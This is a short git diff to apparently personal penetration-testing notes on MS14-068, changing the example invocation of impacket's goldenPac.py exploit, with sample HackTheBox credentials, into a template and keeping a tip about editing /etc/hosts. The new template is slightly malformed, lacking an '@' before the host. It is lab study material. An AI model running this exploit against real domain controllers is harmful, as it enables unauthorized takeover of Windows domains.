--- a/MS14-068.md
+++ b/MS14-068.md
@@ -6,8 +6,7 @@ Vulnerable: Windows server 2008 R2 or older...
 
 from impacket suite:
 
-  goldenPac.py htb.local/james:password@mantis
-               <domain>  <user>  <pwd>  <domain*>
+`goldenPac.py '<domain>/<user>:<password><machine.domain>`
 
 IMPORTAN NOTE 1: Exploit it first time and look what domain targets (Example mantis.htb.local)
 then put this domain at /etc/hosts
